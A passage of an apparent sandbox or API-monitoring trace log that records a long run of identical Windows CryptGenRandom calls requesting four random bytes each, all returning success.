pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 